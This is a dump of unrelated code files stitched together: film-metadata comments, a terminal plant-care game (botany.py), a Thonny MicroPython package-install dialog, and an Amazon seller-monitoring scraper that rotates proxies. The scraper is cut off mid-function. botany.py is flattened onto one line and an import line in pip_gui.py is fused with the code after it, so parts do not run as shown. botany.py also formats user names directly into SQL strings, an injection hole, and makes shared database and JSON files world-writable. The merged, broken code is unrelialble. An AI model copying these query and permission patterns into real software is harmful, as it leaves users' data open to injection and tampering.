# filmName = 'identity'
# f = Film(filmName)
# f.build()
# info = f.info
# print(dumps(info))

# 'rating' : None,
# 'download': None,
# 'reviews' : None,
# 'prizes-won': None,
# 'prizes-nomenee': None,
# 'torrent' : None,
# 'subtitle': None,

## https://www.totaleclips.com/Player/Bounce.aspx?eclipid=e17963&bitrateid=455&vendorid=102&type=.mp4
botany.py
#!/usr/bin/env python3 import time import pickle import json import os import random import getpass import threading import errno import uuid import sqlite3 import argparse from menu_screen import * # TODO: # - Switch from personal data file to table in DB class Plant(object): # This is your plant! stage_list = [ 'seed', 'seedling', 'young', 'mature', 'flowering', 'seed-bearing', ] color_list = [ 'red', 'orange', 'yellow', 'green', 'blue', 'indigo', 'violet', 'white', 'black', 'gold', 'rainbow', ] rarity_list = [ 'common', 'uncommon', 'rare', 'legendary', 'godly', ] species_list = [ 'poppy', 'cactus', 'aloe', 'venus flytrap', 'jade plant', 'fern', 'daffodil', 'sunflower', 'baobab', 'lithops', 'hemp', 'pansy', 'iris', 'agave', 'ficus', 'moss', 'sage', 'snapdragon', 'columbine', 'brugmansia', 'palm', 'pachypodium', ] mutation_list = [ '', 'humming', 'noxious', 'vorpal', 'glowing', 'electric', 'icy', 'flaming', 'psychic', 'screaming', 'chaotic', 'hissing', 'gelatinous', 'deformed', 'shaggy', 'scaly', 'depressed', 'anxious', 'metallic', 'glossy', 'psychedelic', 'bonsai', 'foamy', 'singing', 'fractal', 'crunchy', 'goth', 'oozing', 'stinky', 'aromatic', 'juicy', 'smug', 'vibrating', 'lithe', 'chalky', 'naive', 'ersatz', 'disco', 'levitating', 'colossal', 'luminous', 'cosmic', 'ethereal', 'cursed', 'buff', 'narcotic', 'gnu/linux', 'abraxan', # rip dear friend ] def __init__(self, this_filename, generation=1): # Constructor self.plant_id = str(uuid.uuid4()) self.life_stages = (3600*24, (3600*24)*3, (3600*24)*10, (3600*24)*20, (3600*24)*30) # self.life_stages = (2, 4, 6, 8, 10) # debug mode self.stage = 0 self.mutation = 0 self.species = random.randint(0,len(self.species_list)-1) self.color = random.randint(0,len(self.color_list)-1) self.rarity = self.rarity_check() self.ticks = 0 self.age_formatted = "0" self.generation = generation self.dead = False self.write_lock = False self.owner = getpass.getuser() self.file_name = this_filename self.start_time = int(time.time()) 
self.last_time = int(time.time()) # must water plant first day self.watered_timestamp = int(time.time())-(24*3600)-1 self.watered_24h = False self.visitors = [] def migrate_properties(self): # Migrates old data files to new if not hasattr(self, 'generation'): self.generation = 1 if not hasattr(self, 'visitors'): self.visitors = [] def parse_plant(self): # Converts plant data to human-readable format output = "" if self.stage >= 3: output += self.rarity_list[self.rarity] + " " if self.mutation != 0: output += self.mutation_list[self.mutation] + " " if self.stage >= 4: output += self.color_list[self.color] + " " output += self.stage_list[self.stage] + " " if self.stage >= 2: output += self.species_list[self.species] + " " return output.strip() def rarity_check(self): # Generate plant rarity CONST_RARITY_MAX = 256.0 rare_seed = random.randint(1,CONST_RARITY_MAX) common_range = round((2/3)*CONST_RARITY_MAX) uncommon_range = round((2/3)*(CONST_RARITY_MAX-common_range)) rare_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range)) legendary_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range-rare_range)) common_max = common_range uncommon_max = common_max + uncommon_range rare_max = uncommon_max + rare_range legendary_max = rare_max + legendary_range godly_max = CONST_RARITY_MAX if 0 <= rare_seed <= common_max: rarity = 0 elif common_max < rare_seed <= uncommon_max: rarity = 1 elif uncommon_max < rare_seed <= rare_max: rarity = 2 elif rare_max < rare_seed <= legendary_max: rarity = 3 elif legendary_max < rare_seed <= godly_max: rarity = 4 return rarity def dead_check(self): # if it has been >5 days since watering, sorry plant is dead :( time_delta_watered = int(time.time()) - self.watered_timestamp if time_delta_watered > (5 * (24 * 3600)): self.dead = True return self.dead def update_visitor_db(self, visitor_names): game_dir = os.path.dirname(os.path.realpath(__file__)) garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite') conn = 
sqlite3.connect(garden_db_path) for name in (visitor_names): c = conn.cursor() c.execute("SELECT * FROM visitors WHERE garden_name = '{}' AND visitor_name = '{}' ".format(self.owner, name)) data=c.fetchone() if data is None: sql = """ INSERT INTO visitors (garden_name,visitor_name,weekly_visits) VALUES('{}', '{}',1)""".format(self.owner, name) c.execute(sql) else: sql = """ UPDATE visitors SET weekly_visits = weekly_visits + 1 WHERE garden_name = '{}' AND visitor_name = '{}'""".format(self.owner, name) c.execute(sql) conn.commit() conn.close() def guest_check(self): user_dir = os.path.expanduser("~") botany_dir = os.path.join(user_dir,'.botany') visitor_filepath = os.path.join(botany_dir,'visitors.json') guest_timestamps = [] visitors_this_check = [] if os.path.isfile(visitor_filepath): with open(visitor_filepath, 'r') as visitor_file: data = json.load(visitor_file) if data: for element in data: if element['user'] not in self.visitors: self.visitors.append(element['user']) if element['user'] not in visitors_this_check: visitors_this_check.append(element['user']) # prevent users from manually setting watered_time in the future if element['timestamp'] <= int(time.time()): guest_timestamps.append(element['timestamp']) try: self.update_visitor_db(visitors_this_check) except: pass with open(visitor_filepath, 'w') as visitor_file: visitor_file.write('[]') else: with open(visitor_filepath, mode='w') as f: json.dump([], f) os.chmod(visitor_filepath, 0o666) if not guest_timestamps: return self.watered_timestamp all_timestamps = [self.watered_timestamp] + guest_timestamps all_timestamps.sort() # calculate # of days between each guest watering timestamp_diffs = [(j-i)/86400.0 for i, j in zip(all_timestamps[:-1], all_timestamps[1:])] # plant's latest timestamp should be set to last timestamp before a # gap of 5 days # TODO: this considers a plant watered only on day 1 and day 4 to be # watered for all 4 days - need to figure out how to only add score # from 24h after each 
watered timestamp last_valid_element = next((x for x in timestamp_diffs if x > 5), None) if not last_valid_element: # all timestamps are within a 5 day range, can just use latest one return all_timestamps[-1] last_valid_index = timestamp_diffs.index(last_valid_element) # slice list to only include up until a >5 day gap valid_timestamps = all_timestamps[:last_valid_index + 1] return valid_timestamps[-1] def water_check(self): self.watered_timestamp = self.guest_check() self.time_delta_watered = int(time.time()) - self.watered_timestamp if self.time_delta_watered <= (24 * 3600): if not self.watered_24h: self.watered_24h = True return True else: self.watered_24h = False return False def mutate_check(self): # Create plant mutation # Increase this # to make mutation rarer (chance 1 out of x each second) CONST_MUTATION_RARITY = 20000 mutation_seed = random.randint(1,CONST_MUTATION_RARITY) if mutation_seed == CONST_MUTATION_RARITY: # mutation gained! mutation = random.randint(0,len(self.mutation_list)-1) if self.mutation == 0: self.mutation = mutation return True else: return False def growth(self): # Increase plant growth stage if self.stage < (len(self.stage_list)-1): self.stage += 1 def water(self): # Increase plant growth stage if not self.dead: self.watered_timestamp = int(time.time()) self.watered_24h = True def start_over(self): # After plant reaches final stage, given option to restart # increment generation only if previous stage is final stage and plant # is alive if not self.dead: next_generation = self.generation + 1 else: # Should this reset to 1? Seems unfair.. for now generations will # persist through death. 
next_generation = self.generation self.write_lock = True self.kill_plant() while self.write_lock: # Wait for garden writer to unlock # garden db needs to update before allowing the user to reset pass if not self.write_lock: self.__init__(self.file_name, next_generation) def kill_plant(self): self.dead = True def unlock_new_creation(self): self.write_lock = False def start_life(self): # runs life on a thread thread = threading.Thread(target=self.life, args=()) thread.daemon = True thread.start() def life(self): # I've created life :) while True: if not self.dead: if self.watered_24h: self.ticks += 1 if self.stage < len(self.stage_list)-1: if self.ticks >= self.life_stages[self.stage]: self.growth() if self.mutate_check(): pass if self.water_check(): # Do something pass if self.dead_check(): # Do something else pass # TODO: event check generation_bonus = 0.2 * (self.generation - 1) adjusted_sleep_time = 1 / (1 + generation_bonus) time.sleep(adjusted_sleep_time) class DataManager(object): # handles user data, puts a .botany dir in user's home dir (OSX/Linux) # handles shared data with sqlite db # TODO: .dat save should only happen on mutation, water, death, exit, # harvest, otherwise # data hasn't changed... 
# can write json whenever bc this isn't ever read for data within botany user_dir = os.path.expanduser("~") botany_dir = os.path.join(user_dir,'.botany') game_dir = os.path.dirname(os.path.realpath(__file__)) this_user = getpass.getuser() savefile_name = this_user + '_plant.dat' savefile_path = os.path.join(botany_dir, savefile_name) #set this.savefile_path to guest_garden path garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite') garden_json_path = os.path.join(game_dir, 'garden_file.json') harvest_file_path = os.path.join(botany_dir, 'harvest_file.dat') harvest_json_path = os.path.join(botany_dir, 'harvest_file.json') def __init__(self): self.this_user = getpass.getuser() # check if instance is already running # check for .botany dir in home try: os.makedirs(self.botany_dir) except OSError as exception: if exception.errno != errno.EEXIST: raise self.savefile_name = self.this_user + '_plant.dat' def check_plant(self): # check for existing save file if os.path.isfile(self.savefile_path): return True else: return False def start_threads(self,this_plant): # creates threads to save files every minute death_check_thread = threading.Thread(target=self.death_check_update, args=(this_plant,)) death_check_thread.daemon = True death_check_thread.start() autosave_thread = threading.Thread(target=self.autosave, args=(this_plant,)) autosave_thread.daemon = True autosave_thread.start() def death_check_update(self,this_plant): # .1 second updates and lock to minimize race condition while True: is_dead = this_plant.dead_check() if is_dead: self.save_plant(this_plant) self.data_write_json(this_plant) self.update_garden_db(this_plant) self.harvest_plant(this_plant) this_plant.unlock_new_creation() time.sleep(.1) def autosave(self, this_plant): # running on thread, saves plant every 5s TODO: this is unnecessary # and breaks shit probably file_update_count = 0 while True: file_update_count += 1 self.save_plant(this_plant) self.data_write_json(this_plant) 
self.update_garden_db(this_plant) if file_update_count == 12: # only update garden json every 60s self.update_garden_json() time.sleep(5) file_update_count %= 12 def load_plant(self): # load savefile with open(self.savefile_path, 'rb') as f: this_plant = pickle.load(f) # migrate data structure to create data for empty/nonexistent plant # properties this_plant.migrate_properties() # get status since last login is_watered = this_plant.water_check() is_dead = this_plant.dead_check() if not is_dead: if is_watered: time_delta_last = int(time.time()) - this_plant.last_time ticks_to_add = min(time_delta_last, 24*3600) this_plant.time_delta_watered = 0 self.last_water_gain = time.time() else: ticks_to_add = 0 this_plant.ticks += ticks_to_add * (0.2 * (this_plant.generation - 1) + 1) return this_plant def plant_age_convert(self,this_plant): # human-readable plant age age_seconds = int(time.time()) - this_plant.start_time days, age_seconds = divmod(age_seconds, 24 * 60 * 60) hours, age_seconds = divmod(age_seconds, 60 * 60) minutes, age_seconds = divmod(age_seconds, 60) age_formatted = ("%dd:%dh:%dm:%ds" % (days, hours, minutes, age_seconds)) return age_formatted def init_database(self): # check if dir exists, create sqlite directory and set OS permissions to 777 sqlite_dir_path = os.path.join(self.game_dir,'sqlite') if not os.path.exists(sqlite_dir_path): os.makedirs(sqlite_dir_path) os.chmod(sqlite_dir_path, 0o777) conn = sqlite3.connect(self.garden_db_path) init_table_string = """CREATE TABLE IF NOT EXISTS garden ( plant_id tinytext PRIMARY KEY, owner text, description text, age text, score integer, is_dead numeric )""" c = conn.cursor() c.execute(init_table_string) conn.close() # init only, creates and sets permissions for garden db and json if os.stat(self.garden_db_path).st_uid == os.getuid(): os.chmod(self.garden_db_path, 0o666) open(self.garden_json_path, 'a').close() os.chmod(self.garden_json_path, 0o666) def migrate_database(self): conn = 
sqlite3.connect(self.garden_db_path) migrate_table_string = """CREATE TABLE IF NOT EXISTS visitors ( id integer PRIMARY KEY, garden_name text, visitor_name text, weekly_visits integer )""" c = conn.cursor() c.execute(migrate_table_string) conn.close() return True def update_garden_db(self, this_plant): # insert or update this plant id's entry in DB # TODO: make sure other instances of user are deleted # Could create a clean db function self.init_database() self.migrate_database() age_formatted = self.plant_age_convert(this_plant) conn = sqlite3.connect(self.garden_db_path) c = conn.cursor() # try to insert or replace update_query = """INSERT OR REPLACE INTO garden ( plant_id, owner, description, age, score, is_dead ) VALUES ( '{pid}', '{pown}', '{pdes}', '{page}', {psco}, {pdead} ) """.format(pid = this_plant.plant_id, pown = this_plant.owner, pdes = this_plant.parse_plant(), page = age_formatted, psco = str(this_plant.ticks), pdead = int(this_plant.dead)) c.execute(update_query) conn.commit() conn.close() def retrieve_garden_from_db(self): # Builds a dict of dicts from garden sqlite db garden_dict = {} conn = sqlite3.connect(self.garden_db_path) # Need to allow write permissions by others conn.row_factory = sqlite3.Row c = conn.cursor() c.execute('SELECT * FROM garden ORDER BY owner') tuple_list = c.fetchall() conn.close() # Building dict from table rows for item in tuple_list: garden_dict[item[0]] = { "owner":item[1], "description":item[2], "age":item[3], "score":item[4], "dead":item[5], } return garden_dict def update_garden_json(self): this_garden = self.retrieve_garden_from_db() with open(self.garden_json_path, 'w') as outfile: json.dump(this_garden, outfile) pass def save_plant(self, this_plant): # create savefile this_plant.last_time = int(time.time()) temp_path = self.savefile_path + ".temp" with open(temp_path, 'wb') as f: pickle.dump(this_plant, f, protocol=2) os.rename(temp_path, self.savefile_path) def data_write_json(self, this_plant): # create 
personal json file for user to use outside of the game (website?) json_file = os.path.join(self.botany_dir,self.this_user + '_plant_data.json') # also updates age age_formatted = self.plant_age_convert(this_plant) plant_info = { "owner":this_plant.owner, "description":this_plant.parse_plant(), "age":age_formatted, "score":this_plant.ticks, "is_dead":this_plant.dead, "last_watered":this_plant.watered_timestamp, "file_name":this_plant.file_name, "stage": this_plant.stage_list[this_plant.stage], "generation": this_plant.generation, } if this_plant.stage >= 3: plant_info["rarity"] = this_plant.rarity_list[this_plant.rarity] if this_plant.mutation != 0: plant_info["mutation"] = this_plant.mutation_list[this_plant.mutation] if this_plant.stage >= 4: plant_info["color"] = this_plant.color_list[this_plant.color] if this_plant.stage >= 2: plant_info["species"] = this_plant.species_list[this_plant.species] with open(json_file, 'w') as outfile: json.dump(plant_info, outfile) def harvest_plant(self, this_plant): # TODO: plant history feature - could just use a sqlite query to retrieve all of user's dead plants # harvest is a dict of dicts # harvest contains one entry for each plant id age_formatted = self.plant_age_convert(this_plant) this_plant_id = this_plant.plant_id plant_info = { "description":this_plant.parse_plant(), "age":age_formatted, "score":this_plant.ticks, } if os.path.isfile(self.harvest_file_path): # harvest file exists: load data with open(self.harvest_file_path, 'rb') as f: this_harvest = pickle.load(f) new_file_check = False else: this_harvest = {} new_file_check = True this_harvest[this_plant_id] = plant_info # dump harvest file temp_path = self.harvest_file_path + ".temp" with open(temp_path, 'wb') as f: pickle.dump(this_harvest, f, protocol=2) os.rename(temp_path, self.harvest_file_path) # dump json file with open(self.harvest_json_path, 'w') as outfile: json.dump(this_harvest, outfile) return new_file_check if __name__ == '__main__': parser = 
argparse.ArgumentParser() parser.add_argument("--no-color", action="store_true") args = parser.parse_args() my_data = DataManager() # if plant save file exists if my_data.check_plant(): my_plant = my_data.load_plant() # otherwise create new plant else: my_plant = Plant(my_data.savefile_path) my_data.data_write_json(my_plant) # my_plant is either a fresh plant or an existing plant at this point my_plant.start_life() my_data.start_threads(my_plant) try: enable_color = not args.no_color botany_menu = CursedMenu(my_plant,my_data,enable_color) my_data.save_plant(my_plant) my_data.data_write_json(my_plant) my_data.update_garden_db(my_plant) finally: cleanup()
pip_gui.py
import os
import shutil
import subprocess
import tempfile
import threading
import tkinter as tk
from tkinter.messagebox import showerror
from tkinter import ttk
from typing import cast, Tuple

from thonny import running, get_runner, get_workbench, ui_utils
from thonny.common import InlineCommand
from thonny.languages import tr
from thonny.plugins.files import upload, prepare_upload_items
from thonny.plugins.micropython import MicroPythonProxy, LocalMicroPythonProxy
from thonny.plugins.micropython.micropip import MICROPYTHON_ORG_JSON
from thonny.plugins.pip_gui import (
    BackendPipDialog,
    _fetch_url_future,
    get_not_supported_translation,
)
from thonny.running import InlineCommandDialog
from thonny.workdlg import SubprocessDialog


class MicroPythonPipDialog(BackendPipDialog):
    """Package-manager dialog for MicroPython backends.

    Packages are installed with the bundled micropip shim into a local temp
    directory and then uploaded to the device's lib directory.
    """

    def __init__(self, master):
        self._current_temp_dir = None  # micropip's install target while an action runs
        self._checkboxes = []  # per-file checkbuttons shown in the module-info view
        super().__init__(master)
        assert isinstance(self._backend_proxy, MicroPythonProxy)

    def _create_pip_process(self, args):
        # plain pip can't target MicroPython; use the micropip shim instead
        return self._create_python_process(["-m", "thonny.plugins.micropython.micropip"] + args)

    def _get_active_version(self, name):
        # Don't have dist-level information
        return None

    def _on_install_click(self):
        # the install button doubles as a "search" button in the module-info view
        if self.install_button["text"] == self.get_install_button_text():
            super()._on_install_click()
        elif self.install_button["text"] == self.get_search_button_text():
            self.search_box.delete(0, "end")
            self.search_box.insert(
                0, "micropython pycopy " + self.current_package_data["info"]["name"]
            )
            self._on_search(None)
        else:
            raise RuntimeError(
                "Unexpected text '%s' on install button" % self.install_button["text"]
            )

    def _on_uninstall_click(self):
        # the uninstall button doubles as a "delete selected" button
        if self.uninstall_button["text"] == self.get_uninstall_button_text():
            super()._on_uninstall_click()
        elif self.uninstall_button["text"] == self.get_delete_selected_button_text():
            self._delete_selected()
        else:
            raise RuntimeError(
                "Unexpected text '%s' on install button" % self.install_button["text"]
            )

    def _delete_selected(self):
        # delete the checked files/dirs on the device, then refresh the list
        paths = []
        for cb in self._checkboxes:
            if cb.variable.get():
                paths.append(cb.full_path)

        if paths:
            self._delete_paths(paths)
            self._start_update_list(self.current_package_data["info"]["name"])

    def _delete_paths(self, paths):
        get_runner().send_command_and_wait(
            InlineCommand("delete", paths=paths),
            dialog_title=tr("Deleting"),
        )

    def _get_install_command(self):
        return ["install", "-p", self._current_temp_dir]

    def _perform_pip_action(self, action: str) -> bool:
        # FIX: was annotated -> bool but returned None; propagate the result
        result = self._perform_pip_action_without_refresh(action)
        if result:
            self._show_instructions()
            # Make the old package go away as fast as possible
            # don't know which module to show, therefore None arg
            self._start_update_list(None)
            get_workbench().event_generate("RemoteFilesChanged")
        return result

    def _perform_pip_action_without_refresh(self, action: str) -> bool:
        assert action in ["install", "advanced"]
        self._current_temp_dir = tempfile.mkdtemp()
        try:
            return super()._perform_pip_action_without_refresh(action)
        finally:
            # the temp dir only lives for the duration of one action
            shutil.rmtree(self._current_temp_dir, ignore_errors=True)
            self._current_temp_dir = None

    def _create_upload_command(self) -> InlineCommand:
        # collect every file and sub-directory micropip produced in the temp dir
        paths = []
        for (dirpath, dirnames, filenames) in os.walk(self._current_temp_dir):
            if dirpath != self._current_temp_dir:
                paths.append(dirpath)
            for filename in filenames:
                source_path = os.path.join(dirpath, filename)
                paths.append(source_path)

        items = []
        for path in paths:
            for item in prepare_upload_items(
                path, self._current_temp_dir, self._get_target_directory()
            ):
                if item not in items:
                    items.append(item)

        if not items:
            raise RuntimeError("Could not find anything in temp directory. Was it a dummy package?")
        return InlineCommand("upload", items=items)

    def _create_python_process(self, args):
        proc = running.create_frontend_python_process(args, stderr=subprocess.STDOUT)
        return proc, proc.cmd

    def _on_listbox_select_package(self, name):
        self._start_show_module_info(name)

    def _start_show_module_info(self, name):
        # ask the backend for the module's location and files (async)
        self._clear_info_text()
        self.command_frame.grid_remove()
        self.title_label["text"] = tr("Module") + (" '%s'" % name)
        self.title_label.grid()
        self._set_state("fetching")
        self.advanced_button.grid_remove()
        get_workbench().bind("get_module_info_response", self._complete_display_module_info, True)
        get_runner().send_command(InlineCommand("get_module_info", module_name=name))

    def _complete_display_module_info(self, msg):
        self._set_state("idle")
        self.current_package_data = {"info": {"name": msg.module_name}}
        get_workbench().unbind("get_module_info_response", self._complete_display_module_info)
        self._append_info_text(tr("Installed to:") + " ", ("caption",))
        self._append_info_text(msg["location"] + "\n")

        for cb in self._checkboxes:
            cb.destroy()
        self._checkboxes.clear()

        for item in msg["effective_items"]:
            self._append_file_checkbox(item, msg["location"])

        if msg["shadowed_items"]:
            self._append_info_text("\n")
            self._append_info_text(tr("Shadowed items (not importable):") + "\n", ("caption",))
            for item in msg["shadowed_items"]:
                self._append_file_checkbox(item, None)

        self.command_frame.grid()
        self.uninstall_button.grid()
        self.install_button["text"] = self.get_search_button_text()
        self.uninstall_button["text"] = self.get_delete_selected_button_text()
        self.uninstall_button["state"] = "normal" if self._checkboxes else "disabled"
        self._select_list_item(msg.module_name)

    def _append_file_checkbox(self, full_path, context_dir):
        # deletable paths get a checkbox; read-only paths a plain bullet line
        if context_dir:
            text = full_path[len(context_dir) :].strip("/")
        else:
            text = full_path

        if self._can_delete(full_path):
            cb = ttk.Checkbutton(self.info_text, text=text)
            var = tk.IntVar(value=1)
            cb.variable = var  # to avoid it being gc-d
            cb["variable"] = var
            cb.full_path = full_path
            self._checkboxes.append(cb)
            self.info_text.window_create("end", window=cb)
        else:
            self._append_info_text("• " + text)
        self._append_info_text("\n")

    def _show_package_info(self, name, data, error_code=None):
        super(MicroPythonPipDialog, self)._show_package_info(name, data, error_code)
        if name.lower().startswith("micropython-"):
            # micropython.org may publish its own build of this package
            self._set_state("fetching")
            self._append_info_text("\n\n")
            self.info_text.mark_set("wait", "end-1c")
            self.info_text.mark_gravity("wait", "left")
            self._append_info_text("Querying micropython.org, please wait...")
            _start_fetching_micropython_org_info(name, self._add_micropython_org_info)

    def _add_micropython_org_info(self, name, data, error_code=None):
        self._set_state("idle")
        self.info_text.direct_delete("wait", "end")
        self.info_text.mark_unset("wait")
        self._append_info_text("\n")
        if error_code == 404:
            self._append_info_text(
                tr(
                    "Package is not available at micropython.org. "
                    "Version at PyPI will be installed."
                )
            )
        elif error_code:
            self._append_info_text("Error %s\n" % error_code)
            self._append_info_text(data.get("error", "") + "\n")
        else:
            ver = data["info"]["version"]
            self._append_info_text(
                tr(
                    "NB! micropython.org has published version %s of this package "
                    "and this will be installed by default."
                )
                % ver
                + "\n",
                ("bold",),
            )
            self._append_info_text(
                "If you want to install a version from PyPI, then use the advanced install button '...'. "
                "Note that PyPI version may require a specific fork of MicroPython."
            )

    def _can_delete(self, path):
        # items under the firmware's frozen lib dir cannot be removed
        return not path.startswith("/usr/lib")

    def _get_target_directory(self):
        target_dir = self._backend_proxy.get_pip_target_dir()
        return target_dir

    def _read_only(self):
        return self._get_target_directory() is None

    def _show_instructions_about_existing_packages(self):
        self._append_info_text(tr("Upgrade or uninstall") + "\n", ("caption",))
        self.info_text.direct_insert(
            "end", tr("For upgrading simply install the package again.") + "\n"
        )
        self.info_text.direct_insert(
            "end", tr("For uninstalling delete corresponding files.") + "\n\n"
        )

    def _show_instructions_about_installing_from_local_file(self):
        # not supported
        pass

    def _use_user_install(self):
        return False

    def does_support_update_deps_switch(self):
        return False

    def _show_instructions_about_target(self):
        self._append_info_text(tr("Scope") + "\n", ("caption",))
        if isinstance(self._backend_proxy, LocalMicroPythonProxy):
            dir_tags = ("url",)
        else:
            dir_tags = ()

        if len(self._backend_proxy.get_lib_dirs()) == 1:
            self._append_info_text(self._get_target_directory(), dir_tags)
            self._append_info_text("\n")
        else:
            self.info_text.direct_insert(
                "end", tr("This dialog lists top-level modules from following directories:\n")
            )
            for path in self._backend_proxy.get_lib_dirs():
                self._append_info_text("• ")
                self._append_info_text(path, dir_tags)
                self._append_info_text("\n")
            self._append_info_text("\n")
            self._append_info_text(tr("New packages will be installed to") + "\n")
            self._append_info_text("• ")
            self._append_info_text(self._get_target_directory(), dir_tags)
            self._append_info_text("\n")

    def _show_read_only_instructions(self):
        self._append_info_text(tr("Not available") + "\n", ("caption",))
        if not self._get_target_directory():
            reason = " (" + tr("no absolute lib directory in sys.path") + ")"
        else:
            reason = ""
        self.info_text.direct_insert(
            "end",
            get_not_supported_translation() + reason + "\n\n",
        )

    def _tweak_search_results(self, results, query):
        # rank MicroPython/Pycopy-specific packages before generic matches
        if results is None:
            return results

        query = query.lower()

        def get_order(item):
            name = item["name"].lower()
            if name == query:
                return 0
            elif name == "micropython-" + query:
                return 1
            elif name == "pycopy-" + query:
                return 2
            elif "micropython" in name:
                return 3
            elif "pycopy" in name:
                return 4
            elif item.get("description"):
                description = item["description"]
                if "micropython" in description.lower() or "pycopy" in description.lower():
                    return 5
            return 6

        return sorted(results, key=get_order)

    def _get_interpreter(self):
        return self._backend_proxy.get_full_label()

    def _get_extra_switches(self):
        return []

    def _run_pip_with_dialog(self, args, title) -> Tuple[int, str, str]:
        args = ["-m", "thonny.plugins.micropython.micropip"] + args
        proc = running.create_frontend_python_process(args, stderr=subprocess.STDOUT)
        cmd = proc.cmd
        dlg = InstallAndUploadDialog(
            self,
            proc,
            back_cmd=self._create_upload_command,
            title="micropip",
            instructions=title,
            autostart=True,
            output_prelude=subprocess.list2cmdline(cmd) + "\n",
        )
        ui_utils.show_dialog(dlg)
        assert dlg.returncode is not None
        return dlg.returncode, dlg.stdout, dlg.stderr


class LocalMicroPythonPipDialog(MicroPythonPipDialog):
    """Variant for MicroPython running on the local machine: micropip can
    install straight into the target directory, so no upload step is needed."""

    def _get_install_command(self):
        return ["install", "-p", self._get_target_directory()]

    def _upload_installed_files(self) -> bool:
        "nothing to do -- micropip installed files directly to the right directory"

    def _delete_paths(self, paths):
        # assuming all files are listed if their directory is listed
        # NOTE(review): os.removedirs also prunes empty parent dirs — confirm intended
        for path in sorted(paths, key=len, reverse=True):
            if os.path.isfile(path):
                os.remove(path)
            else:
                os.removedirs(path)

    def _run_pip_with_dialog(self, args, title) -> Tuple[int, str, str]:
        args = ["-m", "thonny.plugins.micropython.micropip"] + args
        proc = running.create_frontend_python_process(args, stderr=subprocess.STDOUT)
        cmd = proc.cmd
        dlg = SubprocessDialog(self, proc, "micropip", long_description=title, autostart=True)
        ui_utils.show_dialog(dlg)
        return dlg.returncode, dlg.stdout, dlg.stderr


def _start_fetching_micropython_org_info(name, completion_handler):
    """Asynchronously fetch `name`'s JSON from micropython.org and invoke
    completion_handler(name, data, error_code) on the Tk main loop."""
    import urllib.error
urllib.parse # Fetch info from PyPI url = MICROPYTHON_ORG_JSON % urllib.parse.quote(name) url_future = _fetch_url_future(url) def poll_fetch_complete(): import json if url_future.done(): try: _, bin_data = url_future.result() raw_data = bin_data.decode("UTF-8") completion_handler(name, json.loads(raw_data), None) except urllib.error.HTTPError as e: completion_handler( name, {"info": {"name": name}, "error": str(e), "releases": {}}, e.code ) else: tk._default_root.after(200, poll_fetch_complete) poll_fetch_complete() class InstallAndUploadDialog(InlineCommandDialog): def __init__( self, master, proc, back_cmd, title, instructions=None, output_prelude=None, autostart=True ): self._stage = "install" self._proc = proc super().__init__( master, back_cmd, title, instructions=instructions, output_prelude=output_prelude, autostart=autostart, ) def start_work(self): threading.Thread(target=self.work_in_thread, daemon=True).start() def work_in_thread(self): self.set_action_text("Installing to temp directory") self.append_text("Installing to temp directory\n") while True: line = self._proc.stdout.readline() if not line: break self.append_text(line) self.set_action_text_smart(line) self.returncode = self._proc.wait() if self.returncode: self.set_action_text("Error") self.append_text("\nmicropip returned with error code %s\n" % self.returncode) else: self.set_action_text("Copying to the device") self.append_text("Copying to the device\n") self.report_done(self.returncode == 0) def on_done(self, success): if not success or self._stage == "upload": super().on_done(success) if self._stage == "upload": # Returcode is required by the superclass if success: self.returncode = 0 else: self.returncode = -1 return assert self._stage == "install" # only half of the work is done self._stage = "upload" super().send_command_to_backend()
monitor.py
import threading
import time
from random import choice
from selenium import webdriver
from modules.amazon import amazon
from modules.cache import get_cache
from modules.cache import save_cache


def create_browser(headless : bool, proxy = None):
    """Create a Firefox webdriver, optionally routed through *proxy* and/or
    headless.

    NOTE(review): the proxy is set by mutating the module-global
    webdriver.DesiredCapabilities.FIREFOX dict, which affects every Firefox
    instance created afterwards in this process -- confirm this is intended.
    """
    options = webdriver.FirefoxOptions()
    if(proxy):
        webdriver.DesiredCapabilities.FIREFOX["proxy"] = {
            "httpProxy": proxy,
            "ftpProxy": proxy,
            "sslProxy": proxy,
            "proxyType": "MANUAL",
        }
    if(headless):
        options.add_argument("--headless")
    print("Monitor starting using proxy: {}".format(proxy))
    return webdriver.Firefox(None, options=options)


class monitor:
    """Polls an Amazon product page for seller changes and fires
    seller_added / seller_removed / update events.

    NOTE(review): __init__ blocks forever (sleep loop) until Ctrl-C, so
    constructing this class never returns under normal operation.
    """

    def __init__(self, headless : bool, interval : float, product : str, proxies = None):
        proxy = None
        if(proxies):
            proxy = choice(proxies)  # pick one proxy at random for this session
        self.browser = create_browser(headless, proxy)
        self.update_interval = interval or 60  # seconds between polls
        self.product_id = product
        # Event name -> list of callbacks; "update" always includes the
        # internal cache-diff handler.
        self._events = {
            "seller_added": [],
            "seller_removed": [],
            "update": [self.__on_update],
        }
        self.__closed = False  # set from the main thread to stop the poll loop
        try:
            t = threading.Thread(target=self.update)
            print("Monitor successfully started.")
            #t.daemon = True
            t.start()
            # Keep the main thread alive so KeyboardInterrupt can be caught.
            while True:
                time.sleep(100)
        except (KeyboardInterrupt, SystemExit):
            print("Received keyboard interrupt, quitting threads!")
            self.__closed = True

    def update(self):
        """Poll loop (runs on the worker thread): scrape product + sellers,
        then fire the "update" event each interval until closed."""
        amzon = amazon(self.browser)
        while(self.product_id is not None):
            if(self.__closed):
                self.browser.close()
                break
            print("Running")
            product_id = self.product_id
            thumbnail = None
            url = None
            name = None
            product_data = None
            cache = get_cache(product_id)
            if(cache):
                thumbnail = cache["thumbnail"]
                url = cache["url"]
                name = cache["product_name"]
            # Only hit the product page when the cache has no name yet.
            if(not name):
                product_data = amzon.get_product(product_id)
            data = {
                "product_id": product_id,
                "product_name": name or product_data["name"],
                "url": url or amzon.product_link_from_id(product_id),
                "price": None,
                "thumbnail": thumbnail or product_data["thumbnail"],
                "sellers": []
            }
            data["sellers"] = amzon.get_sellers(product_id)
            self.trigger("update", data)
            time.sleep(self.update_interval)

    # Self note: __ makes a function private
    def __on_update(self, data, removeLater = None):
        """Diff the fresh seller list against the cached one and fire
        seller_added / seller_removed for the differences, then re-cache.

        NOTE(review): removeLater is never used -- it exists because trigger()
        always passes two positional arguments to callbacks.
        """
        product_id = data["product_id"]
        cache_data = get_cache(data["product_id"])
        if(not cache_data):
            save_cache(product_id, data)
        else:
            for seller in data["sellers"]:
                if(not seller in cache_data["sellers"]):
                    self.trigger("seller_added", seller, data)
            for seller in cache_data["sellers"]:
